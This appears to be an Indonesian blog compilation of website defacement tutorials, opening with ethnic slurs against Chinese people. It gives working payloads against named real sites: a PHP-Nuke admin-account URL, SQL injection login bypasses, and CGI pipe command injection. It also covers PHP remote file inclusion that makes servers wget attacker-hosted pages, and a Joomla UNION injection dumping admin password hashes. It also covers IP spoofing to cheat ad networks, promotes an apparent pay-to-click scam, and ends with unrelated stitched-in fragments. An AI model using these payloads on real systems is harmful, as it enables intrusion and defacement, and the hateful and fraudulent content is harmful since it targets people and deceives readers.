Contoh Deface Id.wikipedia

  • Uploaded by: vavavaya
  • 0
  • 0
  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Contoh Deface Id.wikipedia as PDF for free.

More details

  • Words: 5,363
  • Pages: 41
Contoh deface id.wikipedia.org

MEDAN bajingan CINA Bangsat… …………yang pernah merasa sakit ati sama CINA dea Cyndi nyoto rahman langkah-langkah deface website lengkap...!

udah lama nih udah nda nge posting tentang hacking maklum lagi sibuk cari dollar dan di sini saya akan menjelaskan berbagi macan jenis deface yang skarang di pergunakan para hacked indo untuk hack website orang malaysia untuk membela manohara....! (seperti emould.com.cn dan hacked by x-blank ) wikipedia.org bajingan bangsat kaskus.us tikus got buaya darat bangsat luuuuh kaskus racun aids

Kompolnas.go.id Deface situs php nuke Buka situs www.google.com kemudian ketik =>

allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php. Nah ….. kalo udah ketemu targetnya maka langkah selanjutnya adalah : 1. www.id.wikipedia.org/nuke/index.php 2. www.id.wikipedia.org/nuke/admin.php => index.php yg diatas tadi dirubah menjadi admin.php 3. Masukkan bug ini di belakang situs tadi :

Kaskus.us ?op=AddAuthor&add_aid=budakbaonk&add_name= God&add_pwd=bajingan&add_email= [email protected]&add_radminsuper=1&admin= eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.id.wikipedia.org/nuke/admin.php? op=AddAuthor&add_aid=budakbaonk&add_name= God&add_pwd=bajingan&add_email= [email protected]&add_radminsuper=1&admin= eCcgVU5JT04gU0VMRUNUIDEvKjox Kalo nggak mau berarti situs tsb udah di path ama admin nya. Tapi kalo berhasil, maka di url/browsing lu muncul www.id.wikipedia.org/nuke/admin.php?op=mod_author 5. Disana lu di suruh login, masukin id & password lu tadi. Masih ingat kan ? id=budakbaonk => liat yg diatas tadi password=bajingan => liat yg diatas tadi

Id.wikipedia.org Nah lu skrg udah masuk ke “Administration Menu” situs tsb. Berarti lu udah mengusai situs tsb skrg ! He he he he he Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages), Kolom title => Kolom content => Kolom expiration => unlimited trus klik tab add messages yg ada dibawah Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal www.id.wikipedia.org/nuke atau www.id.wikipedia.org/nuke/index.php kalo nggak ada hasil deface lu coba klik tab refresh yg ada diatas yg disamping url/browsing lu ======================================== Deface asp/iis dgn menggunakan win 98 1. Klik Icon “My Computer” di komputer kamu. 2. Cari Icon “Web Folder” didalam My Computer Itu. 3. Klick lagi Icon “Add web folder” dan akan muncul “Type the location to add”. 4. Ketiklah nama situs yang akan kita deface/tambahkan filenya misalnya http://www.52down.com. Kemudian klik Next. 5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish. kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface jadi kamu musti cari target lain. 6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat ada file http://www.52down.com. Klik file situs tsb. 7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html, lu buat dulu file html di ms.fronpage trus simpan di kompi lu) terus copy kemudian kembali lagi ke file http://www.52down.com,

paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya udah dipath sama adminnya, jadi kamu musti cari target lain. 8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing misalnya http://www.52down.com/Test.html 9. Kalau mau mencari target caranya cari di www.google.com terus ketik allinurl:.com/index.asp atau allinurl:.org/default.asp tinggal kreatifitas kamu mencari target. Atau bisa cari target di http://www.zone-h.org/en/defacements/ klik mirror yg sebelah kanan (yg windows 2000), Perhatikan target nya => Defacer: Infektion Group Domain : www.namaid.wikipedia.org <<> ======================================= cara membuat html : Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds, trus pilih enable hyperlink, trus pilih color background, pilih warna hitam, trus ok Trus pilih tab center yg diatas (rata tengah) kayak ms.word, ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A), pilih warna merah, kalo udah tulis Hacked by nama nick kamu, tekan enter 3 kali Trus ketik Hey Admin……..do you a need help ? trus enter sekali, trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures, trus pilih from file…., di file name ketik http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu trus ok Kalo mau pake musik pilih tab format diatas, trus pilih backgrounds trus pilih tab general, pada “background sound location” ketik http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu trus ok Utk nyimpan nya pilih tab file diatas, pilih save as… file name : Hacked atau nama nick kamu, trus ok Catatan : seandainya waktu lu nyimpan file ada keluar “save embedded file” pilih “set action” trus pilih “dont save” trus ok Utk meliat hasilnya pilih tab preview dibagian bawah.

======================================= Deface guestbook (buku tamu) Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook (bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak semua guestbook bisa dideface. Langkah2 nya I. Cari target guestbook di www.google.co.id dgn mengetikkan site:my guestbook.php atau site:com bukutamu.php II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia. Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli, cukup identitas palsu aja. contoh : Nama : boneka lucu Email : [email protected] Website : www.boneka-lucu.com Asal : toko boneka Komentar : Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan sebuah gambar (jgn gambar porno ya ? nggak boleh lho ? ntar dimarah mama). Trus klik tombol “submit” atau tombol apa

namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb. Berarti guestbook tsb bisa dideface. Catatan : Kalo nggak ada gambarnya, yg ada hanya tulisan berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong ! cari target yg lain. III. Kalo udah muncul gambar yg kita masukkan tadi, buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia. contoh : Nama : deface Email : [email protected] Website : www.deface.com Asal : dunia maya komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface. Catatan : Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai keinginan lu.

IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu. Nah…muncul deh hasil deface kita di guestbook tsb. ====================================== deface asp dgn sql injection 1. buka browsing/url www.google.co.id 2. ketik site:go.id login.asp misal nya kita dapat target www.namaid.wikipedia.org/login.asp 3. username dan pass ketik ‘or”=’ 4. buka satu persatu file yg ada disana 5. cari file yg bisa kita ubah/deface 6. buka browsing/url baru trus ketikkan target tadi misal nya www.namaid.wikipedia.org 7. kalo hasil nya belum ada, klik tab refresh disamping url lu ====================================== deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/we b_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html …/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl:*.cgi * page:.*html+site:.us atau

http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+si te:.com&hl=id&lr=&start=10&sa=N target nya musti file html diujung nya kalo mau tambahin |pwd| ======================================= deface cgi II http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|id| http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|pwd| http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html| http://www.sports-media.org/adspro/jh.html http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm << page="top.htm|pwd|">>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< html =""> http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|whereis%20index.html| http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html| echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”>decae.html| &cart_id=9721374.5730 http://samedesign.us/cgi-bin/web_store.cgi?page=about.html| echo%20 ======================================

deface php dgn injection http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c= 4 itu file aslinya modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path = itu bug nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip t/arai2.jpg? jadi index.php?name=PNphpBB2&file=index&c=4 dibuang cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip t/arai2.jpg? dikotak command unix masukin wget http://geocities.com/nusantarajaya_2004/arai.html cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html http://www.narnia-chroniken.de <<< phpbb_root_path="http://geocities.com/sandal_karet/script/arai2.jpg?" > ======================================== deface php dgn injection II http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.p hp itu file aslinya http://www.giphted.com/index.php?siteName=http://www.geocities.co m/sandal_karet/script/arai2.jpg? dikotak masukin: pwd

jadi pics%2Fom%2Findex.php dibuang cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.co m/sandal_karet/script/arai2.jpg? dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html cara liat nya http://www.giphted.com/arai.html ========================================= deface phpbb/forum http://www.bpmpt.go.id/forum/index.php itu file aslinya includes/db.php?phpbb_root_path= itu bug nya jadi index.php dibuang http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http ://www.geocities.com/sandal_karet/script/ara2.jpg? dikotak masukin: pwd Kalo keluar “Hacking attempt” artinya dipath Tapi kalo berhasil, terserah lu mau di apain…… ========================================== deface phpbb/forum II http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12 itu file aslinya &highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pw d itu bug nya

cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%25 27.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd cara wget nya ada 3 cara : 1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2 527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geoci ties.com/nusantarajaya_2004/arai.html;ls 2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2 527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geoci ties.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm 3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2 527.passthru($HTTP_GET_VARS[a]).%2527&a=lwpdownload%20http://geocities.com/nusantarajaya_2004/arai.html;ls biasa nya cara ke 3 yg berhasil. cara liat nya http://singapore.bluejackings.net/arai.html ========================================= cara liat fs tanpa login http://www.friendster.com/useropen.php?uid= <<<<<<> =========================================== deface php dgn injection III langsung di tembak aja bos biar ga lama2

www.id.wikipedia.org/modules/PNphpBB2/includes/functions_admin. php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm? kolo berhasil seperti biasa cmd sql php injection buat nyari akses ke foldernya cmd => find / -perm 777 -type d klo foldernya permision denied berarti kita ga bisa apa2 di folder itu cari folder yg ga ada tulisan perm ambil contoh ini http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/fun ctions_admin.php?phpbb_root_path=http://www.geocities.com/ank_n ewz/sql.htm? cari akses foldernya [commndnya diatas] cmd => find / -perm 777 -type d bakal makan B/w jd sabar aja === contoh -perm denied == find: /mnt/drive2/lost+found: Permission denied find: /proc/tty/driver: Permission denied find: /proc/1/task/1/fd: Permission denied itu artinya no akses kita cari yg lain tp usahakan foldernya yg /var/www/ klo ga ada juga gpp ada yg lain /home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya] [command dasar OSnya] => wget, dir, cat, rm, rv -rf dll skarang kita wget cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html coba lo masukin ke cmdnya ——————————————————— –10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html => `arai.html’ Resolving www.geocities.com… 66.218.77.68 Connecting to www.geocities.com[66.218.77.68]:80… connected.

HTTP request sent, awaiting response… 200 OK Length: 6,021 [text/html] 0K ….. 100% 98.21 KB/s 10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021] ——————————————————— itu artinya sukses ke save karena httpdocs gampang cara liatnya /home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo] contoh www.hdca.org/downloads/arai.html selsai deh gampang kan http://www.zoneh.org/defaced/2005/08/06/www.estudioadobbato.com.ar/ http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk= http://www.tyg2004.de/index.php?page=http://www.geocities.com/jam bihackerlinkcrew/sql.htm?&cmd=id;pwd http://img143.imageshack.us/img143/6782/hacked8lc.jpg http://www.sobatpadi.net/download/ http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://w ww.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20 -la http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani memanfaatkan google untuk curi password website...! cara sangat mudah cukup copas perintah berkut : "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" di google.co.id ato google.com

kemudian lihatlah semua web yang memiliki bug pasti tercetak oleh omm kesayanganku yaitu omm google...! segitu aja dulu aja ya....! hack ip untuk para hacker hack ip ini sering saya gunakan pada saat saya ingin main curang pada beberapa media yang memberikan uang kepada saya seperti kumpulblogger.com ato adsense untuk hack IP address (agar IP address kita berubah, caranya gampang bgt). pergi kesini, dan tinggal masukkan URL yang anda tuju: http://anonymizer.nntime.com/ download pengubah IP address disini http://www.unrestrictedsurf.com/ Cuma segitu aja, semoga berguna!! meningkatkan pengunjung sekaligus berburu dollar Pertama kali blog anda dipublikasikan, anda pasti selalu berharap ada pengunjung yang bertamu. Namun kadang-kadang pengunjung yang diharapkan itu tidak sesuai harapan. Semua masalah itu umum dilalui oleh peblogger. Sekarang anda jangan khawatir tentang jumlah pengunjung yang datang bertamu ke blog anda. Hebatnya lagi selain dibanjiri oleh pengunjung, anda juga dapat bonus berupa Dollar. Jangan lewatkan kesempatan emas ini..Ikuti yuk cara-caranya. Lihat banner dibawah ini, dapat anda klik untuk melakukan pendaftaran. Mudah kok...tinggal memasukan alamat email anda, maka anda telah terdaftar di Venifine. Coba yah...! Join Vinefire!

1. Register/Daftar ke Vinefire.com vinefire merupakan sebuah program yang menawarkan bagi hasil uang sebanyak $50/Hari bagi free member dan $100/Hari bagi Premium member (untuk menjadi premium member hanya dengan membayar $5 saja), anda dapat bagi hasil uang hanya dengan melakukan klik link ($0,45), vote link($0,55), dan add link($0,12). program ini akan membayar membernya pada tanggal 31 Januari 2010. isi semua data - data anda dengan benar. 2. Setelah menjadi member di Vinefire.com anda tinggal masuk ke menu add link, masukkan link blog anda beserta judulnya, lalu klik tombol add link. Lakukan cara tersebut sampai seluruh link yang anda miliki masuk ke Vinefire.com. Coba anda bayangkan apabila pada saat anda memasukkan link tersebut member vinefire.com yang aktif sebanyak 50 orang , yang sedang mencari uang tambahan dengan mengklik link yang ada di situ juga termasuk link anda, anda sudah mendapatkan 50 pengunjung di blog anda, apalagi kalau member vinefire.com sedang banyak - banyaknya maka bersiap siaplah blog anda kebanjiran pengunjung. anda dapat add link di vinefire.com berkali - kali dalam satu hari dalam rentang waktu 40 detik, asalkan link yang anda masukkan berbeda, trik untuk mengatasi hal ini adalah, anda posting sebanyak - banyaknya di blog anda, maka setiap posting yang anda buat pasti berbeda - beda linknya sesuai label atau judul yang anda masukkan, gunakan link tersebut untuk di add link di vinefire.com , bayangkan bila anda memiliki 100 postingan dan anda memasukkan 100 link ke vinefire.com dalam selang waktu 40 detik, dan member vinefire.com yang online sedang banyak, waaaaah mendapatkan pagerank terbaik untuk blog anda bukan lah hal yang sulit. udah blog kita terkenal dapet duit lagi $50 /hari..! Mantaaap! sudah terbukti..! Ayo...daftar segera...dan siap-siap anda akan kebanjiran pengunjung...!!! Anda tidak perlu berpikir masalah dollarnya..sebagai peblogger, meningkatnya jumlah pengunjungpun merupakan kebanggan sendiri. Sql Injection pada Joomla (ternyata joomla punya kelemahan juga ya...!)

Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena

kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=dssyndicate&version=1&feed_id=1

Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=dssyndicate&version=1&feed_id=1'

Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama index2.php?option=dssyndicate&version=1&feed_id=1+order+by+20/* sama

-->

errornya

-->

errornya

… index2.php?option=dssyndicate&version=1&feed_id=1+order+by+21/* berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.

index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14, 15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut, from+jos_users

jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user. Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.

Lihat angka 2 di dalam tag

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ... http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, @@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +jos_users

perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_ users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=dssyndicate&version=1&feed_id=1+union+all+select+1, concat(username,0x3a,password,0x3a,email,0x3a,usertype),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:al [email protected]:Super Administrator

Jika di urutkan : Username : admin Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK Email : [email protected] User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara

bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini. http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0 .15-Stable-Full_Package.zip http://www.unair.info/ilmuwebsite/hack/joomla/com_dssyndicate.tar.gz

cara dapatkan rupiah dari kumpulblogger Kumpul Blogger merupakan situs yang dapat anda jadikan media untuk mendapatkan hasil tambahan berupa rupiah. Caranya tidak sulit, daftar kemudian sisihkan ruangan pada blog anda untuk memasang iklan yang bentuk penampilannya telah ditentukan oleh pihak kumpul blogger. Bergabunglah dengan kumpul blogger...!! Daftarkan segera...!! Caranya...?? * Buka alamat situs ini : http://kumpulblogger.com * Klik Register yang terdapat dibagian kanan atas untuk daftar

* Masukan email anda yang juga sebagai user login anda dan isikan juga dua kata yang tampil dibawahnya pada kotak yang disediakan * Klik tombol register * Tunggu sebentar sampai anda diminta untuk mengecek email * Buka email anda kemudian cek email dari kumpul blogger untuk mendapatkan kode/pasword untuk login. * Kembali ke http://kumpulblogger.com, selanjutnya anda lakukan login dengan email sebagai user dan kode/password dari email sebagai password anda (kotak login ada disebelah kanan atas). setelah selesai, klik tombol login yang berwarna hijau. * Setelah berada di halaman acount anda, silahkan anda coba satu persatu menu yang terdapat di sebelah kiri. * Klik menu tambah blog untuk mendaftarkan blog anda. Isi datadata yang disediakan dengan data blog anda * Klik menu Script Text Advertising untuk Blog anda, kemudian copy kodenya dan letakan pada blog anda. Bentuk tampilannya akan seperti ini. Coba anda klik salah satu link pada klom dibawah ini. * Klik menu Script Mini Banner untuk Blog anda, kemudian copy kodenya dan simpan pada blog anda. Penampilannya seperti ini * Lakukan hal yang sama pada menu-menu lainnya * Selamat mencoba..semoga bermanfaat...!!

Link Refferal Anda adalah : http://Kumpulblogger.com/signup.php?refid=69320 Anda dapat mengajak teman-teman anda untuk mendaftarkan juga ke kumpulblogger.com, Apabila mereka bergabung atas rekomendasi anda, maka setiap 1 kali klik dari pengunjung blog mereka, Anda akan mendapatkan 25 Rupiah. Refferal hanya berlaku untuk level satu saja. http://Kumpulblogger.com/signup.php?refid=69320

Promosikan dan Gunakan URL tersebut untuk memperbanyak anggota kumpulblogger.com yang tergabung dibawah rekomendasi anda. Bagaimana Cara Mendapatkan Peringkat di Search Engine??? Ranking website di search engine yang tinggi boleh dikatakan jadi jaminan tingginya traffic ke website tersebut. Semakin banyak pengunjung berarti semakin banyak peluang kita mendapatkan keuntungan dari produk yang kita tawarkan di website kita. Banyak orang yang bingung bagaimana caranya meraih Ranking Di Search Engine. Ada yang membeli software berharga jutaan rupiah, ada pula yang menyewa perusahaan SEO dengan dana jutaan pula. Sebenarnya ada cara sederhana dan instan yang bisa digunakan tanpa perlu modal besar. yuuk ikuti langkah-langkahnya... 1. Browsing ke search engine besar yaitu Google dan Yahoo saja, yang lain tidak perlu, dengan mengetikkan kata yang sesuai dengan produk/layanan website anda. Misalnya isi website anda mengenai bisnis online, ketikkan bisnis+online. Sebentar kemudian akan muncul sederet link website pesaing anda yang memiliki keyword bisnis online tersebut. 2. Catat lima website yang muncul teratas dari deretan itu dan kunjungilah tiap website tersebut. 3. Dari tiap website, lihat source kodenya. Misalnya anda pakai Internet Explorer, klik menu View di kiri atas dan pilih Source. Dari source kode tersebut lihat dan simpan keyword yang mereka gunakan. 4. Edit header website Anda. Copy sebagian (atau semua? ) keyword tersebut ke header website Anda. Sekarang keyword website Anda sudah sama atau hampir sama dengan lima website pesaing anda yang lebih dulu sudah memiliki ranking top. 5. Daftarkan kembali website anda ke search engine terutama Google dan Yahoo. Setiap saat search engine mendata website

dengan keywod bisnis online, maka website anda akan terkatrol naik. Tapi tunggu dulu. Jangan buru-buru berpuas diri. Apa gunanya keyword bagus kalau layanan yang anda berikan tidak dapat mengimbangi pesaing anda. Jadi lakukan langkah berikut.

id.wikipedia.org 6. Kunjungi website pesaing anda dan pelajari apa keunggulan mereka yang tidak anda miliki. Lihat isi konten mereka. Copy artikelartikel mereka yang tinggi hitsnya ke website anda, tentunya dengan tetap mencantumkan sumbernya. Mungkin website pesaing anda menawarkan download gratis satu sample ebook. Contohlah dan berikan layanan serupa di website anda, kalau bisa dengan kualitas lebih baik dari saingan anda, umpamanya bisa download ebook bukan versi sample tapi full version, dan bukan cuma satu tetapi 5 sekaligus! 7. Bergabunglah menjadi member, mendaftar di forum dan mengikuti layanan newsletter di website pesaing anda. Dengan demikian anda akan selalu mengetahui setiap kali pesaing anda melakukan update

atau meluncurkan produk baru. Anda juga jadi tahu trend atau segmentasi konsumen mereka yang adalah setipe dengan calon konsumen anda. Anda tinggal mengikuti. 8. Bila website pesaing anda menyediakan ruang iklan, pasang iklan website Anda. dan saya sudah membuktikanya liat I am cracking a password file for a client, and have a copy of the NTDS.DIT file from a domain controller (win2k/Active Directory). We do not haveaccess to L0phtcrack currently, and I'm on a deadline. I was going to useJohn the Ripper with some plugins written by 3rd parties to crack thepassword file, but apparently the NTDS.DIT file isn't really a hashed filethat John can read After some research, I found that you can use PWDUMP2 to actually export theuser/pw information on the DC to a hashed file that you can then crack withJohn (even if syskey is used after SP2). However, in order for PWDUMP towork, you have to run it as an administrator from the DC itself, where itinjects its own .dll into the lsass.exe process, which I no longer haveaccess to. My question is this: Does anyone know if there is a way to extract the user/pw information fromthe NTDS.DIT file (rather than from lsass.exe on the server) into a hashedfile that I can then crack with John? If not, does anyone have any other suggestions on what I can do with thisNTDS.DIT file to crack it? 0 comments SQL Server Bugs at 10:29 AM Posted by Ade cahya Bagi Anda orang IT pasti sudah tidak asing lagi mendengar nama Microsoft SQL Server. Produk RDBMS terkenal buatan Microsoft ini memang sangat banyak dipakai di seluruh dunia oleh perusahaanperusahaan untuk menyimpan informasi dan aset digital mereka.

